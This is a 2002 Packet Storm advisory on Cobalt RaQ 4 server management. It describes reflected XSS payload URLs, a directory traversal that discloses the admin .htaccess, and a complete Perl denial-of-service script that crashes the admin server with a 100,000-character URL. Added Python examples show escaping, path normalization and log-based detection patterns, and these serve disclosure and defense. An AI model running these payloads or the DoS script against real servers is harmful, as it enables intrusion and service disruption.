Colbalt-RAQ-v4.txt

2002-03-04T00:00:00
ID PACKETSTORM:25837
Type packetstorm
Reporter Alex Hernandez
Modified 2002-03-04T00:00:00

Description

                                        
------oOo----------------
Cobalt RAQ 4 Server Management:
Cross-Site Scripting, Directory Traversal & DoS Vulnerabilities.
------oOo----------------
  
  
Company Affected: www.cobalt.com & www.sun.com
Version: RAQ 4 Server Management.
Download: http://www.cobalt.com/products/raq/index.html
OS Affected: Linux ALL, Solaris ALL.
  
  
Author:  
  
** Alex Hernandez <al3xhernandez@ureach.com>  
** Thanks all the people from Spain and Argentina.  
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.  
  
  
----=[Brief Description]=------------  
  
The Sun Cobalt RaQ is a server appliance for Internet Service Providers
(ISPs). It can host up to 200 individual websites, or it can be dedicated
to a single medium or large customer. This versatility gives a service
provider the opportunity to invest in a single piece of hardware while
migrating business customers up to dedicated servers.
  
  
----=[Summary]=----------------------  
  
  
There are three vulnerabilities:

a) Cross-Site Scripting.
b) Directory Traversal.
c) Denial of Service (exploit released).
  
  
Cobalt's service.cgi does not sanitize the "service" parameter it receives:
any HTML tags or JavaScript in the parameter are echoed back into the
resulting page without being filtered for dangerous content. A similar
problem exists in the other affected script, alert.cgi, where the
unfiltered input ends up in the title of the resulting page.

The CGI scripts are open source. The flaw allows an attacker to insert
malicious content into existing web pages by exploiting the cross-site
scripting vulnerability, for example through a crafted link that a logged-in
administrator is persuaded to follow.
  
  
Affected CGI files:
  
alert.cgi   
service.cgi  
  
  
Workaround:
1) Delete service.cgi from the system, or otherwise disable its execution.
2) Delete alert.cgi from the system, or otherwise disable its execution.
  
  
EXAMPLES:  
  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft%20hole')</script>  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>  
  
LOCATION:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E  
  
COOKIES:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
TAG IMAGES:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>  
  
  
WRITE ON DOCUMENT:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>  
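The following is an added example, written for this page and not taken from the
advisory or from Cobalt's CGI code. It shows, in Python, the two halves of the
problem above: what the vulnerable script does with the "service" parameter
(paste it straight into the HTML) and what the hardened version does (escape it
first). The request URLs are constructed copies of the examples above; 10.0.0.1
is the advisory's placeholder host and the page template around the value is
assumed.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed request URLs in the shape of the examples above. 10.0.0.1 is the
# advisory's placeholder host; the payloads are the ones listed in the text.
EXAMPLE_URLS = [
    "http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>",
    "http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E",
    "http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>",
]


def service_param(url):
    """Return the 'service' query value as the CGI receives it (percent-decoded)."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("service", [""])[0]


def render_unsafe(service):
    """The vulnerable pattern: the parameter is pasted into the HTML as-is."""
    return "<html><body><h2>Service: " + service + "</h2></body></html>"


def render_safe(service):
    """Hardened form: escape &, <, >, double and single quotes so the browser
    treats the value as text.

    html.escape is the right tool for an HTML text or quoted-attribute context
    only; a value dropped into a <script> block or an unquoted attribute needs a
    different encoding, which this example does not cover.
    """
    return "<html><body><h2>Service: " + html.escape(service, quote=True) + "</h2></body></html>"


def reflects_markup(page, payload):
    """True when the raw payload survives into the page, i.e. the browser would parse it as markup."""
    return payload in page


if __name__ == "__main__":
    for url in EXAMPLE_URLS:
        p = service_param(url)
        print(repr(p))
        print("  unsafe reflects markup:", reflects_markup(render_unsafe(p), p))
        print("  safe   reflects markup:", reflects_markup(render_safe(p), p))
```

Note that the check is done on the decoded value: the %3Cscript%3E form in the
LOCATION and COOKIES examples above is identical to the plain form once the CGI
library has percent-decoded it, so any filter applied to the raw query string
would be bypassed by encoding alone.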
  
  
------oOo--------  
  
Directory traversal (configuration file disclosure).
  
  
Exploit:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

The request returns the access-control file of the admin directory:

# Access file for /usr/admserv/html/.cobalt/admin/ (admin )  
order allow,deny  
allow from all  
require user admin  
Authname CobaltRaQ  
Authtype Basic  
  
  
  
The directory on the server is "/usr/admserv/html/.cobalt/admin" by default.
The same ../ technique can be pointed at other directories to retrieve
restricted files, such as password files and user profiles.
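To make the traversal concrete, here is an added example in Python (mine, not
part of the advisory or of Cobalt's code). It normalizes the request path the
way the filesystem will and contrasts a naive prefix check, which the
../admin/.htaccess request passes, with the same check done after
normalization. The document root is the one named in the disclosed .htaccess;
treating /.cobalt/sysManage/ as the only permitted subtree, and the
index.html filename, are assumptions made for the demonstration.

```python
import posixpath
from urllib.parse import unquote

# Paths from the advisory. DOCROOT is the directory the disclosed .htaccess names;
# treating /.cobalt/sysManage/ as the only subtree a request may reach is an
# assumption made for the demonstration, not the RaQ's actual policy.
DOCROOT = "/usr/admserv/html"
ALLOWED_PREFIX = "/.cobalt/sysManage/"
TRAVERSAL_URL_PATH = "/.cobalt/sysManage/../admin/.htaccess"


def normalize_url_path(path):
    """Percent-decode, then collapse '.', '..' and '//' the way the filesystem will.

    posixpath.normpath keeps the leading '/', so '..' cannot climb above the
    virtual root, but it happily climbs out of ALLOWED_PREFIX.
    """
    norm = posixpath.normpath(unquote(path))
    return norm if norm.startswith("/") else "/" + norm


def naive_is_allowed(path):
    """The kind of check that lets the traversal through: a prefix test on the raw string."""
    return path.startswith(ALLOWED_PREFIX)


def strict_is_allowed(path):
    """Correct check: normalize first, then confirm the result is still inside the subtree."""
    return normalize_url_path(path).startswith(ALLOWED_PREFIX)


def filesystem_target(path):
    """The file the web server would actually open for this request path."""
    return DOCROOT + normalize_url_path(path)


if __name__ == "__main__":
    for p in (TRAVERSAL_URL_PATH,
              "/.cobalt/sysManage/%2e%2e/admin/.htaccess",   # same request, percent-encoded
              "/.cobalt/sysManage/index.html"):               # constructed benign request
        print(p)
        print("  naive  allowed:", naive_is_allowed(p))
        print("  strict allowed:", strict_is_allowed(p))
        print("  opens:", filesystem_target(p))
```

Two practical points follow from this. The decode step matters: a %2e%2e form
passes the raw-string check just as the literal ../ does, and only the
normalized path tells the truth. And whatever path check sits in front of it,
an admin server should refuse to serve .htaccess and other dotfiles at all,
since the disclosed file tells an attacker exactly which user name the Basic
authentication realm expects.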
  
  
------oOo--------  
  
Denial of Service.
  
  
Proof of concept:

The admin server crashes after receiving a very long URL:

Example:

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA


The server crashes and the administrator has to restart the service.
  
  
------oOo-------------  
Exploit Code DoS Cobalt4_DoS.pl  
------oOo-------------  
  
  
#!/usr/bin/perl
#
# Simple script to send a long string of 'A's to the server,
# resulting in the server crashing.
#
# Cobalt RAQ DoS v4 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
#
#
# Usage: perl -x Cobalt4_DoS.pl -s <server>
#
# Example:
#
# perl -x Cobalt4_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#

use strict;
use warnings;
use Getopt::Std;
use Socket;            # PF_INET, SOCK_STREAM, sockaddr_in

print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

my %args;
getopts('s:', \%args);
usage() if !defined($args{s});

my ($serv, $port, $def, $num, $data, $buf, $in_addr, $paddr, $proto);

$def  = "A";
$num  = 100000;        # number of 'A's placed in the service= parameter
$data = $def x $num;
$serv = $args{s};
$port = 81;            # admin server port; adjust if your version differs

# One oversized HTTP/1.0 request for service.cgi. The request line must stay
# on a single line and be terminated by CRLF plus an empty line.
$buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: cannot resolve $serv\n");
$paddr   = sockaddr_in($port, $in_addr) || die("Error: $!\n");
$proto   = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) || die("Error: $!");
select(S); $| = 1; select(STDOUT);   # unbuffered writes on the socket
print S $buf;
close(S);

# No response is read: "successful" only means the request was sent.
# Confirm the crash by checking whether port 81 still answers.
print("\nCrash was successful !\n\n");

sub usage { die("\n\nUsage: perl -x $0 -s <server>\n\n"); }
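For the defensive side, an added example (mine, not the advisory's or
Cobalt's): a small scanner over constructed access-log lines that flags the
three request shapes this advisory describes, a reflected-XSS payload in the
service parameter, a ../ in the request path, and an oversized request URI of
the kind the PoC above sends. The log lines, client addresses, status codes
and the 4096-byte URI threshold are assumptions; the request paths are the
ones from this advisory.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (Apache common format) for a RaQ admin server on
# port 81. Clients, timestamps, statuses and sizes are made up; the request
# paths are the ones from this advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Mar/2002:10:12:01 +0000] "GET /cgi-bin/.cobalt/alert/service.cgi?service=httpd HTTP/1.0" 200 512',
    '10.0.0.9 - - [04/Mar/2002:10:12:07 +0000] "GET /cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0" 200 611',
    '10.0.0.9 - - [04/Mar/2002:10:12:09 +0000] "GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 200 143',
    '10.0.0.9 - - [04/Mar/2002:10:12:15 +0000] "GET /cgi-bin/.cobalt/alert/service.cgi?service=/' + "A" * 100000 + ' HTTP/1.0" 500 0',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
# Assumption: no legitimate admin request carries a URI anywhere near this long.
MAX_URI_LEN = 4096
# Markup and script-scheme markers that have no business in a service name.
XSS_RE = re.compile(r'<\s*(script|img|iframe|svg)\b|javascript:|\bon\w+\s*=', re.I)
# A '..' path segment anywhere in the path part of the URI.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')


def classify(line):
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    decoded = unquote(uri)              # inspect what the CGI saw, not the encoded form
    path = decoded.split("?", 1)[0]
    findings = []
    if len(uri) > MAX_URI_LEN:
        findings.append("long-uri")
    if XSS_RE.search(decoded):
        findings.append("xss")
    if TRAVERSAL_RE.search(path):
        findings.append("traversal")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "uri": uri[:80], "findings": findings}


def scan(lines):
    """Parse every line and keep only those with at least one finding."""
    results = []
    for line in lines:
        r = classify(line)
        if r and r["findings"]:
            results.append(r)
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ts"], r["ip"], r["status"], ",".join(r["findings"]), r["uri"])
```

The URI is percent-decoded before the XSS and traversal patterns are applied,
for the same reason as in the CGI itself: the encoded and literal forms of
each payload are the same request once the server has decoded them. The
length check is deliberately done on the raw URI, since that is what the
server had to buffer.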
  
  
  
------oOo------------------------------------  
Vendor Response:
The vendor was notified.

Posted to the Cobalt security lists:
cobalt-security@list.cobalt.com &
jlovell@sun.com

http://www.cobalt.com
Temporary patch:
Delete the affected CGI files from the system, or otherwise disable
their execution.
  
Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.  
  
------oOo------------------------------------  
  
  